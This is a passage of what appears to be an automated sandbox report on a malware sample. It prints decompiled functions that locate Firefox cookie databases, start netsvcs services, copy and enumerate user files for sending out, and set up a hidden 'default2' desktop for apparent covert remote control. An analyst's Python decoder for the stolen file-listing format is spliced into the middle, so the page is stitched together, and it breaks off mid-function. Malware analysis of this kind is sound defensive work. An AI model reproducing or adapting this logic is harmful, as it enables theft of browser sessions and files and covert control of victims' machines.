                                                                                    • String ID: %s%s$%s\%s$%s\Profiles\%s$%s\Profiles\%s\cookies.sqlite$\AppData\Roaming\Mozilla\Firefox$\Profiles\*.*$cmd.exe /c start firefox.exe -no-remote -profile "%s"
                                                                                    • API String ID: 1955834022-409733341
                                                                                    • Opcode ID: ea1e8899554aded477d5172500a7a83c978760a3735e4a014373516bdcb6c050
                                                                                    • Instruction ID: 67efeccbd7dd1c751a266cf120fea73260d4b2a5973f65393a37ee721d2b1a73
                                                                                    • Opcode Fuzzy Hash: ea1e8899554aded477d5172500a7a83c978760a3735e4a014373516bdcb6c050
                                                                                    • Instruction Fuzzy Hash: 27415772A4021D97DB20DBB4DD84DEEB3BCFB48314F5055E6E909D2000EA35FA898F61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 63%
                                                                                    			E04ECB800() {
                                                                                    				int _v8;
                                                                                    				int _v12;
                                                                                    				int _v16;
                                                                                    				void* _v20;
                                                                                    				int _v24;
                                                                                    				int _v28;
                                                                                    				short** _v32;
                                                                                    				int _v36;
                                                                                    				void* _t34;
                                                                                    				int _t39;
                                                                                    				long _t40;
                                                                                    				void* _t41;
                                                                                    				int _t50;
                                                                                    				WCHAR* _t54;
                                                                                    				void* _t66;
                                                                                    				short** _t73;
                                                                                    				void* _t75;
                                                                                    				void* _t76;
                                                                                    				intOrPtr* _t77;
                                                                                    				void* _t80;
                                                                                    
                                                                                    				_v24 = 0;
                                                                                    				_v16 = 0;
                                                                                    				_v8 = 0;
                                                                                    				_v12 = 0;
                                                                                    				_t34 = OpenSCManagerW(0, 0, 0xf003f);
                                                                                    				_t75 = _t34;
                                                                                    				if(_t75 != 0) {
                                                                                    					_t77 = __imp__EnumServicesStatusExW;
                                                                                    					 *_t77(_t75, 0, 0x30, 2, 0, 0,  &_v16,  &_v8,  &_v12, 0, _t76);
                                                                                    					_t39 = _v16;
                                                                                    					if(_t39 != 0) {
                                                                                    						_t40 = _t39 + 0x2c;
                                                                                    						_v32 = _t40;
                                                                                    						_t41 = LocalAlloc(0x40, _t40);
                                                                                    						_v20 = _t41;
                                                                                    						if(_t41 != 0) {
                                                                                    							_push(0);
                                                                                    							_v12 = 0;
                                                                                    							_push( &_v12);
                                                                                    							_push( &_v8);
                                                                                    							_push( &_v16);
                                                                                    							_push(_v32);
                                                                                    							_push(_t41);
                                                                                    							_push(2);
                                                                                    							_push(0x30);
                                                                                    							_push(0);
                                                                                    							_push(_t75);
                                                                                    							if( *_t77() != 0) {
                                                                                    								_t66 = LocalAlloc(0x40, 0x2000);
                                                                                    								_v36 = 0;
                                                                                    								_v28 = 0;
                                                                                    								if(_v8 > 0) {
                                                                                    									_t73 = _v20;
                                                                                    									_v32 = _t73;
                                                                                    									do {
                                                                                    										_t80 = OpenServiceW(_t75,  *_t73, 0x15);
                                                                                    										if(_t80 != 0) {
                                                                                    											if(QueryServiceConfigW(_t80, _t66, 0x2000,  &_v36) != 0 &&  *((intOrPtr*)(_t66 + 4)) == 2) {
                                                                                    												_t54 =  *(_t66 + 0xc);
                                                                                    												if(_t54 != 0 && StrStrIW(_t54, L"-k netsvcs") != 0 && StartServiceW(_t80, 0, 0) != 0) {
                                                                                    													_v24 = _v24 + 1;
                                                                                    												}
                                                                                    											}
                                                                                    											CloseServiceHandle(_t80);
                                                                                    										}
                                                                                    										_t50 = _v28 + 1;
                                                                                    										_t73 =  &(_v32[0xb]);
                                                                                    										_v28 = _t50;
                                                                                    										_v32 = _t73;
                                                                                    									} while (_t50 < _v8);
                                                                                    								}
                                                                                    								LocalFree(_t66);
                                                                                    								LocalFree(_v20);
                                                                                    								CloseServiceHandle(_t75);
                                                                                    								return _v24;
                                                                                    							} else {
                                                                                    								CloseServiceHandle(_t75);
                                                                                    								LocalFree(_v20);
                                                                                    								return 0;
                                                                                    							}
                                                                                    						} else {
                                                                                    							CloseServiceHandle(_t75);
                                                                                    							return 0;
                                                                                    						}
                                                                                    					} else {
                                                                                    						CloseServiceHandle(_t75);
                                                                                    						return 0;
                                                                                    					}
                                                                                    				} else {
                                                                                    					return _t34;
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000), ref: 04ECB82C
                                                                                    • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04ECB85D
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 04ECB867
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseEnumHandleManagerOpenServiceServicesStatus
                                                                                    • String ID: -k netsvcs
                                                                                    • API String ID: 236840872-1604415765
                                                                                    • Opcode ID: 47a4e10d09a500b06ff16264dba61aed561b0819d4f137ba495b0f4b57e89a99
                                                                                    • Instruction ID: be1a2efdf0328346ba8356de5e7e3814aa149c9ee94e7d93be8703b99a763851
                                                                                    • Opcode Fuzzy Hash: 47a4e10d09a500b06ff16264dba61aed561b0819d4f137ba495b0f4b57e89a99
                                                                                    • Instruction Fuzzy Hash: 7451A371A41209AFEB10CFA5ED46FBFBBB8EB44705F10415AFA04E6180D778A905CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 94%
                                                                                    			E04EC7390(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __edi, void* __esi) {
                                                                                    				signed int _v8;
                                                                                    				short _v532;
                                                                                    				short _v1052;
                                                                                    				short _v1572;
                                                                                    				struct _WIN32_FIND_DATAW _v2164;
                                                                                    				WCHAR* _v2168;
                                                                                    				WCHAR* _v2172;
                                                                                    				void* _v2176;
                                                                                    				signed int _t35;
                                                                                    				int _t43;
                                                                                    				void* _t46;
                                                                                    				WCHAR* _t81;
                                                                                    				void* _t82;
                                                                                    				void* _t90;
                                                                                    				WCHAR* _t92;
                                                                                    				void* _t93;
                                                                                    				signed int _t94;
                                                                                    				void* _t95;
                                                                                    				void* _t96;
                                                                                    
                                                                                    				_t35 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t35 ^ _t94;
                                                                                    				_t92 = __edx;
                                                                                    				_t81 = __ecx;
                                                                                    				_v2172 = __edx;
                                                                                    				_v2168 = __ecx;
                                                                                    				E04EDDAD0(__edi,  &_v1572, 0, 0x208);
                                                                                    				_t96 = _t95 + 0xc;
                                                                                    				lstrcpyW( &_v1572, _t81);
                                                                                    				_t90 = lstrcatW;
                                                                                    				lstrcatW( &_v1572, L"\\*");
                                                                                    				_t43 = CreateDirectoryW(_t92, 0);
                                                                                    				_t82 = GetLastError;
                                                                                    				if(_t43 != 0 || GetLastError() == 0xb7) {
                                                                                    					_t46 = FindFirstFileW( &_v1572,  &_v2164);
                                                                                    					_v2176 = _t46;
                                                                                    					if(_t46 == 0xffffffff) {
                                                                                    						goto L12;
                                                                                    					}
                                                                                    					_t93 = lstrcmpW;
                                                                                    					asm("o16 nop [eax+eax]");
                                                                                    					do {
                                                                                    						E04EDDAD0(_t90,  &_v1052, 0, 0x208);
                                                                                    						lstrcpyW( &_v1052, _v2168);
                                                                                    						lstrcatW( &_v1052, 0x4efc92c);
                                                                                    						lstrcatW( &_v1052,  &(_v2164.cFileName));
                                                                                    						E04EDDAD0(_t90,  &_v532, 0, 0x208);
                                                                                    						_t96 = _t96 + 0x18;
                                                                                    						lstrcpyW( &_v532, _v2172);
                                                                                    						lstrcatW( &_v532, 0x4efc92c);
                                                                                    						lstrcatW( &_v532,  &(_v2164.cFileName));
                                                                                    						if((_v2164.dwFileAttributes & 0x00000010) == 0 || lstrcmpW( &(_v2164.cFileName), ".") == 0 || lstrcmpW( &(_v2164.cFileName), L"..") == 0) {
                                                                                    							CopyFileW( &_v1052,  &_v532, 0);
                                                                                    						} else {
                                                                                    							if(CreateDirectoryW( &_v532, 0) != 0 || GetLastError() == 0xb7) {
                                                                                    								E04EC7390(_t82,  &_v1052,  &_v532, _t90, _t93);
                                                                                    							}
                                                                                    						}
                                                                                    					} while (FindNextFileW(_v2176,  &_v2164) != 0);
                                                                                    					goto L12;
                                                                                    				} else {
                                                                                    					L12:
                                                                                    					return E04ED572E(_v8 ^ _t94);
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • lstrcpyW.KERNEL32 ref: 04EC73D4
                                                                                    • lstrcatW.KERNEL32(?,04EFE170), ref: 04EC73EC
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 04EC73F1
                                                                                    • GetLastError.KERNEL32 ref: 04EC7401
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 04EC741C
                                                                                    • lstrcpyW.KERNEL32 ref: 04EC7463
                                                                                    • lstrcatW.KERNEL32(?,04EFC92C), ref: 04EC7475
                                                                                    • lstrcatW.KERNEL32(?,?), ref: 04EC7485
                                                                                    • lstrcpyW.KERNEL32 ref: 04EC74AA
                                                                                    • lstrcatW.KERNEL32(?,04EFC92C), ref: 04EC74BC
                                                                                    • lstrcatW.KERNEL32(?,?), ref: 04EC74CC
                                                                                    • lstrcmpW.KERNEL32(?,04EFC940), ref: 04EC74E3
                                                                                    • lstrcmpW.KERNEL32(?,04EFC944), ref: 04EC74F5
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 04EC7504
                                                                                    • GetLastError.KERNEL32 ref: 04EC750E
                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 04EC753A
                                                                                    • FindNextFileW.KERNEL32(?,00000010), ref: 04EC754D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Filelstrcpy$CreateDirectoryErrorFindLastlstrcmp$CopyFirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 2173410017-0
                                                                                    • Opcode ID: e640083ee271ae93745271452a8e6e7ec8f3debc2f1ad8c8b22570c699181427
                                                                                    • Instruction ID: 1c436ad4b9dc2398a713c811e1b5b9ae3d9ee77a1ae79f58fe43112b6f0b9944
                                                                                    • Opcode Fuzzy Hash: e640083ee271ae93745271452a8e6e7ec8f3debc2f1ad8c8b22570c699181427
                                                                                    • Instruction Fuzzy Hash: AF416271D0021DAADB20DBB1DC88FE977BCFB48705F1455E9AA19E3044EB74EA858F90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 75%
                                                                                    			E04EB42B0(void* __ebx, signed int __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                    				signed int _v12;
                                                                                    				short _v1056;
                                                                                    				char _v2096;
                                                                                    				short _v3136;
                                                                                    				intOrPtr _v3704;
                                                                                    				struct _WIN32_FIND_DATAW _v3728;
                                                                                    				signed int _v3732;
                                                                                    				long _v3736;
                                                                                    				intOrPtr _v3740;
                                                                                    				signed int _v3744;
                                                                                    				void* _v3748;
                                                                                    				signed int _t80;
                                                                                    				void* _t88;
                                                                                    				signed int _t91;
                                                                                    				signed int _t92;
                                                                                    				signed int _t99;
                                                                                    				signed int _t100;
                                                                                    				void* _t101;
                                                                                    				signed int _t104;
                                                                                    				signed int _t128;
                                                                                    				void* _t133;
                                                                                    				signed int _t137;
                                                                                    				signed int _t139;
                                                                                    				void* _t140;
                                                                                    				void* _t141;
                                                                                    				intOrPtr _t142;
                                                                                    				intOrPtr _t143;
                                                                                    				intOrPtr _t144;
                                                                                    				intOrPtr _t145;
                                                                                    				intOrPtr _t147;
                                                                                    				void* _t148;
                                                                                    				void* _t149;
                                                                                    				void* _t150;
                                                                                    				long _t152;
                                                                                    				void* _t153;
                                                                                    				long _t154;
                                                                                    				signed int _t155;
                                                                                    				void* _t156;
                                                                                    				void* _t157;
                                                                                    
                                                                                    				_t80 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v12 = _t80 ^ _t155;
                                                                                    				_t147 = _a4;
                                                                                    				_t152 = 0x2800;
                                                                                    				_v3744 = __ecx;
                                                                                    				_v3740 = _t147;
                                                                                    				_v3732 = _a8;
                                                                                    				_v3736 = 0x2800;
                                                                                    				_t133 = LocalAlloc(0x40, 0x2800);
                                                                                    				wsprintfW( &_v3136, L"%s\\*.*", _t147);
                                                                                    				_t157 = _t156 + 0xc;
                                                                                    				_t88 = FindFirstFileW( &_v3136,  &_v3728);
                                                                                    				_v3748 = _t88;
                                                                                    				if(_t88 != 0xffffffff) {
                                                                                    					 *_t133 = 0x74;
                                                                                    					_t148 = 1;
                                                                                    					asm("o16 nop [eax+eax]");
                                                                                    					do {
                                                                                    						_t137 = ".";
                                                                                    						_t91 =  &(_v3728.cFileName);
                                                                                    						while(1) {
                                                                                    							_t140 =  *_t91;
                                                                                    							if(_t140 !=  *_t137) {
                                                                                    								break;
                                                                                    							}
                                                                                    							if(_t140 == 0) {
                                                                                    								L7:
                                                                                    								_t92 = 0;
                                                                                    							} else {
                                                                                    								_t145 =  *((intOrPtr*)(_t91 + 2));
                                                                                    								_t14 = _t137 + 2; // 0x2e0000
                                                                                    								if(_t145 !=  *_t14) {
                                                                                    									break;
                                                                                    								} else {
                                                                                    									_t91 = _t91 + 4;
                                                                                    									_t137 = _t137 + 4;
                                                                                    									if(_t145 != 0) {
                                                                                    										continue;
                                                                                    									} else {
                                                                                    										goto L7;
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    							L9:
                                                                                    							if(_t92 != 0) {
                                                                                    								_t137 = L"..";
                                                                                    								_t99 =  &(_v3728.cFileName);
                                                                                    								while(1) {
                                                                                    									_t141 =  *_t99;
                                                                                    									if(_t141 !=  *_t137) {
                                                                                    										break;
                                                                                    									}
                                                                                    									if(_t141 == 0) {
                                                                                    										L15:
                                                                                    										_t100 = 0;
                                                                                    									} else {
                                                                                    										_t144 =  *((intOrPtr*)(_t99 + 2));
                                                                                    										_t17 = _t137 + 2; // 0x2e
                                                                                    										if(_t144 !=  *_t17) {
                                                                                    											break;
                                                                                    										} else {
                                                                                    											_t99 = _t99 + 4;
                                                                                    											_t137 = _t137 + 4;
                                                                                    											if(_t144 != 0) {
                                                                                    												continue;
                                                                                    											} else {
                                                                                    												goto L15;
                                                                                    											}
                                                                                    										}
                                                                                    									}
                                                                                    									L17:
                                                                                    									if(_t100 != 0) {
                                                                                    										_t101 = 0;
                                                                                    										do {
                                                                                    											_t137 =  *(_t155 + _t101 - 0xe60) & 0x0000ffff;
                                                                                    											_t101 = _t101 + 2;
                                                                                    											 *(_t155 + _t101 - 0x82e) = _t137;
                                                                                    										} while (_t137 != 0);
                                                                                    										if(_a12 != 0) {
                                                                                    											E04EDEDE0( &_v2096);
                                                                                    											_t157 = _t157 + 4;
                                                                                    										}
                                                                                    										if(_a16 != 0 || (_v3728.dwFileAttributes & 0x00000010) == 0) {
                                                                                    											_t102 =  &_v2096;
                                                                                    											if(_a20 == 0) {
                                                                                    												_t139 = _v3732;
                                                                                    												while(1) {
                                                                                    													_t142 =  *_t102;
                                                                                    													if(_t142 !=  *_t139) {
                                                                                    														break;
                                                                                    													}
                                                                                    													if(_t142 == 0) {
                                                                                    														L31:
                                                                                    														_t137 = 0;
                                                                                    													} else {
                                                                                    														_t143 =  *((intOrPtr*)(_t102 + 2));
                                                                                    														if(_t143 !=  *((intOrPtr*)(_t139 + 2))) {
                                                                                    															break;
                                                                                    														} else {
                                                                                    															_t102 = _t102 + 4;
                                                                                    															_t139 = _t139 + 4;
                                                                                    															if(_t143 != 0) {
                                                                                    																continue;
                                                                                    															} else {
                                                                                    																goto L31;
                                                                                    															}
                                                                                    														}
                                                                                    													}
                                                                                    													L33:
                                                                                    													_t104 = 0 | _t137 == 0x00000000;
                                                                                    													goto L34;
                                                                                    												}
                                                                                    												asm("sbb ecx, ecx");
                                                                                    												_t137 = _t139 | 0x00000001;
                                                                                    												goto L33;
                                                                                    											} else {
                                                                                    												_push(_v3732);
                                                                                    												_push( &_v2096);
                                                                                    												_t128 = E04EDD36B(_t137);
                                                                                    												_t157 = _t157 + 8;
                                                                                    												asm("sbb eax, eax");
                                                                                    												_t104 =  ~( ~_t128);
                                                                                    											}
                                                                                    											L34:
                                                                                    											if(_t104 != 0) {
                                                                                    												_t37 = _t152 - 0x410; // 0x23f0
                                                                                    												if(_t148 > _t37) {
                                                                                    													_t154 = _t152 + 0x410;
                                                                                    													_v3736 = _t154;
                                                                                    													_t133 = LocalReAlloc(_t133, _t154, 0x42);
                                                                                    												}
                                                                                    												 *(_t148 + _t133) = _v3728.dwFileAttributes & 0x00000010;
                                                                                    												_t149 = _t148 + 1;
                                                                                    												wsprintfW( &_v1056, L"%s\\%s", _v3740,  &(_v3728.cFileName));
                                                                                    												_t153 = 2 + lstrlenW( &_v1056) * 2;
                                                                                    												E04EDDC90(_t149 + _t133,  &_v1056, _t153);
                                                                                    												_t150 = _t149 + _t153;
                                                                                    												_t152 = _v3736;
                                                                                    												_t157 = _t157 + 0x1c;
                                                                                    												 *((intOrPtr*)(_t150 + _t133)) = _v3728.nFileSizeHigh;
                                                                                    												 *((intOrPtr*)(_t150 + _t133 + 4)) = _v3728.nFileSizeLow;
                                                                                    												 *((intOrPtr*)(_t150 + _t133 + 8)) = _v3728.ftLastWriteTime;
                                                                                    												 *((intOrPtr*)(_t150 + _t133 + 0xc)) = _v3704;
                                                                                    												_t148 = _t150 + 0x10;
                                                                                    											}
                                                                                    											if((_v3728.dwFileAttributes & 0x00000010) != 0) {
                                                                                    												goto L39;
                                                                                    											}
                                                                                    										} else {
                                                                                    											L39:
                                                                                    											E04EDDAD0(_t148,  &_v1056, 0, 0x410);
                                                                                    											wsprintfW( &_v1056, L"%s\\%s", _v3740,  &(_v3728.cFileName));
                                                                                    											_t137 = _v3744;
                                                                                    											_t157 = _t157 + 0x1c;
                                                                                    											E04EB42B0(_t133, _t137, _t148, _t152,  &_v1056, _v3732, _a12, _a16, _a20);
                                                                                    										}
                                                                                    									}
                                                                                    									goto L40;
                                                                                    								}
                                                                                    								asm("sbb eax, eax");
                                                                                    								_t100 = _t99 | 0x00000001;
                                                                                    								goto L17;
                                                                                    							}
                                                                                    							goto L40;
                                                                                    						}
                                                                                    						asm("sbb eax, eax");
                                                                                    						_t92 = _t91 | 0x00000001;
                                                                                    						goto L9;
                                                                                    						L40:
                                                                                    					} while (FindNextFileW(_v3748,  &_v3728) != 0);
                                                                                    					if(_t148 > 1) {
                                                                                    						_push(_t137);
                                                                                    						_push(0x3f);
                                                                                    						_push(_t148);
                                                                                    						_push(_t133);
                                                                                    						E04EB1C60( *((intOrPtr*)(_v3744 + 4)));
                                                                                    					}
                                                                                    					LocalFree(_t133);
                                                                                    					FindClose(_v3748);
                                                                                    				}
                                                                                    				return E04ED572E(_v12 ^ _t155);
                                                                                    			}
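The loop above enumerates a directory with FindFirstFileW/FindNextFileW, appends one record per entry to a LocalAlloc'd buffer that is grown in 0x410-byte steps via LocalReAlloc, recurses into subdirectories (the call to E04EB42B0 under L39), and finally passes the buffer to E04EB1C60 with the constant 0x3f. What an analyst usually wants next is a decoder for that buffer so captured traffic can be read back. The following Python is an added example written for this page, not code from the sample or from the sandbox report; the record layout (one flag byte holding dwFileAttributes & 0x10, a NUL-terminated UTF-16LE "%s\%s" path, nFileSizeHigh, nFileSizeLow, then the low and high dwords of ftLastWriteTime) is inferred from the stores at offsets 0, 4, 8 and 0xc after the string copy and is therefore an assumption, as are the helper names. Any header bytes written before the first record are not visible in this excerpt and are not handled.

```python
"""
Decoder for the per-file record layout that the enumeration loop above
appears to build (flag byte, "%s\\%s" path, size, last-write time) before
handing the buffer to E04EB1C60 with command id 0x3f.

Added analyst-side example; not code from the sample.  The layout is
inferred from the decompiled stores and is an assumption:

    u8       is_dir   dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY (0x10 or 0)
    wchar[]  path     NUL-terminated UTF-16LE, "<parent>\\<cFileName>"
    u32      nFileSizeHigh
    u32      nFileSizeLow
    u32      ftLastWriteTime.dwLowDateTime
    u32      ftLastWriteTime.dwHighDateTime
"""
import struct
from datetime import datetime, timedelta, timezone

FILE_ATTRIBUTE_DIRECTORY = 0x10
_EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
_TRAILER = struct.Struct("<IIII")  # size_hi, size_lo, ft_lo, ft_hi


def filetime_to_datetime(ft):
    """Convert a 64-bit Windows FILETIME (100 ns ticks since 1601) to UTC."""
    return _EPOCH_1601 + timedelta(microseconds=ft // 10)


def encode_entry(path, is_dir, size=0, last_write_ft=0):
    """Serialize one record in the assumed layout (used here to build test input)."""
    flag = FILE_ATTRIBUTE_DIRECTORY if is_dir else 0
    rec = bytes([flag]) + path.encode("utf-16-le") + b"\x00\x00"
    rec += _TRAILER.pack(size >> 32, size & 0xFFFFFFFF,
                         last_write_ft & 0xFFFFFFFF, last_write_ft >> 32)
    return rec


def decode_listing(buf):
    """Parse a buffer of consecutive records; raises ValueError on truncation."""
    entries, pos = [], 0
    while pos < len(buf):
        is_dir = bool(buf[pos] & FILE_ATTRIBUTE_DIRECTORY)
        pos += 1
        # Find the UTF-16 terminator on a 2-byte boundary relative to the string start.
        end = pos
        while end + 1 < len(buf) and buf[end:end + 2] != b"\x00\x00":
            end += 2
        if end + 1 >= len(buf):
            raise ValueError("unterminated path at offset %d" % pos)
        path = buf[pos:end].decode("utf-16-le")
        pos = end + 2
        if pos + _TRAILER.size > len(buf):
            raise ValueError("truncated trailer at offset %d" % pos)
        size_hi, size_lo, ft_lo, ft_hi = _TRAILER.unpack_from(buf, pos)
        pos += _TRAILER.size
        entries.append({
            "path": path,
            "is_dir": is_dir,
            "size": (size_hi << 32) | size_lo,
            "last_write": filetime_to_datetime((ft_hi << 32) | ft_lo),
        })
    return entries


def is_well_formed(buf):
    """True if the whole buffer parses as complete records."""
    try:
        decode_listing(buf)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed sample: a directory entry followed by a file entry.
    sample = (encode_entry("C:\\Users\\victim\\Documents", True)
              + encode_entry("C:\\Users\\victim\\Documents\\notes.txt", False,
                             size=1234, last_write_ft=116444736000000000))
    for e in decode_listing(sample):
        print(e)
```

If the captured payload turns out to carry a header before the first record, skip it before calling decode_listing; the decoder deliberately rejects a buffer whose trailing record is cut short rather than silently returning a partial listing, so a truncated capture is reported instead of misread.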

                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,00002800,?,?,?), ref: 04EB42EC
                                                                                    • wsprintfW.USER32 ref: 04EB4301
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 04EB4318
                                                                                    • _wcsstr.LIBVCRUNTIME ref: 04EB4418
                                                                                    • LocalReAlloc.KERNEL32(00000000,000023F0,00000042), ref: 04EB4484
                                                                                    • wsprintfW.USER32 ref: 04EB44B1
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EB44C1
                                                                                    • wsprintfW.USER32 ref: 04EB454C
                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 04EB4583
                                                                                    • LocalFree.KERNEL32(00000000), ref: 04EB45AA
                                                                                    • FindClose.KERNEL32(?), ref: 04EB45B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FindLocalwsprintf$AllocFile$CloseFirstFreeNext_wcsstrlstrlen
                                                                                    • String ID: %s\%s$%s\*.*
                                                                                    • API String ID: 2479123022-1665845743
                                                                                    • Opcode ID: 9e52daa64e18d4dbb00c3bba676fb793c3b512214d50f10c7dc15aa2393fee7c
                                                                                    • Instruction ID: 4316bc4760e0aa830464f546415cd692c446310a765b1206eb9e99ac04b44a4c
                                                                                    • Opcode Fuzzy Hash: 9e52daa64e18d4dbb00c3bba676fb793c3b512214d50f10c7dc15aa2393fee7c
                                                                                    • Instruction Fuzzy Hash: 3A91D1719002199BDB20DF64CC44BFAB7B9FF15318F4498A5E949E3182E772EA84CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 55%
                                                                                    			E04EB6590(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                    				signed int _v12;
                                                                                    				short _v80;
                                                                                    				void* _v108;
                                                                                    				void* _v116;
                                                                                    				struct tagMONITORINFO _v120;
                                                                                    				struct _devicemodeW _v344;
                                                                                    				struct _OSVERSIONINFOA _v496;
                                                                                    				intOrPtr _v780;
                                                                                    				char _v784;
                                                                                    				signed int _t55;
                                                                                    				intOrPtr _t57;
                                                                                    				WCHAR* _t60;
                                                                                    				struct HMONITOR__* _t62;
                                                                                    				signed int _t77;
                                                                                    				struct HDC__* _t83;
                                                                                    				struct HDC__* _t84;
                                                                                    				intOrPtr* _t100;
                                                                                    				signed int _t103;
                                                                                    				struct HDC__* _t104;
                                                                                    				signed int _t109;
                                                                                    				intOrPtr* _t112;
                                                                                    				signed int _t114;
                                                                                    				char* _t115;
                                                                                    				signed int _t116;
                                                                                    
                                                                                    				_t109 = __edx;
                                                                                    				_t55 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v12 = _t55 ^ _t116;
                                                                                    				_t57 = _a4;
                                                                                    				_t112 = __ecx;
                                                                                    				 *__ecx = 0x4efd8b0;
                                                                                    				 *((intOrPtr*)(__ecx + 4)) = _t57;
                                                                                    				 *((intOrPtr*)(_t57 + 0x38)) = __ecx;
                                                                                    				 *((intOrPtr*)(_t112 + 8)) = CreateEventW(0, 1, 0, 0);
                                                                                    				 *_t112 = 0x4efcf68;
                                                                                    				E04EB6520();
                                                                                    				 *(_t112 + 0x74) = 0;
                                                                                    				 *(_t112 + 0x78) = 0;
                                                                                    				 *(_t112 + 0x7c) = 0;
                                                                                    				 *(_t112 + 0x80) = 0;
                                                                                    				 *(_t112 + 0x70) = L"default2";
                                                                                    				_t60 = OpenDesktopW(L"default2", 0, 1, 0x10000000);
                                                                                    				 *(_t112 + 0xc) = _t60;
                                                                                    				_t125 = _t60;
                                                                                    				if(_t60 == 0) {
                                                                                    					 *(_t112 + 0xc) = CreateDesktopW( *(_t112 + 0x70), _t60, _t60, _t60, 0x10000000, _t60);
                                                                                    				}
                                                                                    				SetThreadDesktop( *(_t112 + 0xc));
                                                                                    				_t62 = GetDesktopWindow();
                                                                                    				__imp__MonitorFromWindow(_t62, 2);
                                                                                    				_v120.cbSize = 0x68;
                                                                                    				GetMonitorInfoW(_t62,  &_v120);
                                                                                    				_v344.dmSize = 0xdc;
                                                                                    				EnumDisplaySettingsW( &_v80, 0xffffffff,  &_v344);
                                                                                    				_t114 = _v344.dmPelsWidth;
                                                                                    				_t100 = _t112 + 0x38;
                                                                                    				asm("movd xmm1, esi");
                                                                                    				asm("cvtdq2pd xmm1, xmm1");
                                                                                    				asm("addsd xmm1, [eax*8+0x4efe8d0]");
                                                                                    				asm("movd xmm0, eax");
                                                                                    				asm("cvtdq2pd xmm0, xmm0");
                                                                                    				asm("divsd xmm1, xmm0");
                                                                                    				asm("movsd [edi+0x68], xmm1");
                                                                                    				E04EDDAD0(_t112, _t100, 0, 0x2c);
                                                                                    				_t103 = _v344.dmPelsHeight;
                                                                                    				 *_t100 = 0x28;
                                                                                    				asm("cdq");
                                                                                    				 *(_t112 + 0x3c) = _t114;
                                                                                    				 *(_t112 + 0x40) = _t103;
                                                                                    				 *((intOrPtr*)(_t112 + 0x44)) = 0x180001;
                                                                                    				 *(_t112 + 0x48) = 0;
                                                                                    				 *(_t112 + 0x58) = 0;
                                                                                    				_t77 = (0x1f + (_t114 + _t114 * 2) * 8 + (_t109 & 0x0000001f) >> 5) * _t103 << 2;
                                                                                    				_push(_t77);
                                                                                    				 *(_t112 + 0x4c) = _t77;
                                                                                    				 *((intOrPtr*)(_t112 + 0x10)) = E04ED5785(_t103, _t114, _t125);
                                                                                    				_push( *(_t112 + 0x4c));
                                                                                    				 *((intOrPtr*)(_t112 + 0x88)) = E04ED5785(_t103, _t114, _t125);
                                                                                    				_push( *(_t112 + 0x4c) +  *(_t112 + 0x4c));
                                                                                    				 *((intOrPtr*)(_t112 + 0x84)) = E04ED5785(_t103, _t114, _t125);
                                                                                    				_t83 = GetDC(0);
                                                                                    				 *(_t112 + 0x14) = _t83;
                                                                                    				_t84 = CreateCompatibleDC(_t83);
                                                                                    				asm("movsd xmm0, [edi+0x68]");
                                                                                    				_t104 = _t84;
                                                                                    				 *(_t112 + 0x20) =  *(_t112 + 0x14);
                                                                                    				 *(_t112 + 0x18) = _t104;
                                                                                    				 *(_t112 + 0x24) = _t104;
                                                                                    				asm("movsd [edi+0x28], xmm0");
                                                                                    				_v496.dwOSVersionInfoSize = 0x94;
                                                                                    				GetVersionExA( &_v496);
                                                                                    				E04EC5A10( &_v784, _t112, _t114);
                                                                                    				 *((intOrPtr*)(_t112 + 0x30)) = _v784;
                                                                                    				_push(0x2d);
                                                                                    				 *((intOrPtr*)(_t112 + 0x34)) = _v780;
                                                                                    				_t115 = E04ED5785( &_v784, _t114, _t125);
                                                                                    				if(_t115 != 0) {
                                                                                    					_t52 = _t115 + 1; // 0x1
                                                                                    					 *_t115 = 0xac;
                                                                                    					E04EDDC90(_t52, _t100, 0x2c);
                                                                                    					_push(0x3f);
                                                                                    					_push(0x2d);
                                                                                    					_push(_t115);
                                                                                    					E04EB1C60( *((intOrPtr*)(_t112 + 4)));
